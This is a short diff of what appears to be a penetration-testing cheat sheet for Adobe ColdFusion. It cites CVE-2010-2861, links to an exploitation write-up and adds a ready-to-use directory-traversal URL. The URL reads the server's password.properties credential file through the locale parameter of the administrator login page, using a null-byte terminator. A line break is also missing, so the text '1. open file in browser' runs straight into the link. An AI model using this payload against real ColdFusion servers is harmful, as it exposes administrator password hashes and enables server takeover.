ColdFusion Cheat Sheet

 # CVE-2010-2861 - Adobe ColdFusion Unspecified Directory Traversal Vulnerability

-detailed information about the exploitation of this vulnerability: http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
+detailed information about the exploitation of this vulnerability: http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/1. open file in browser

 http://[server:port]/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en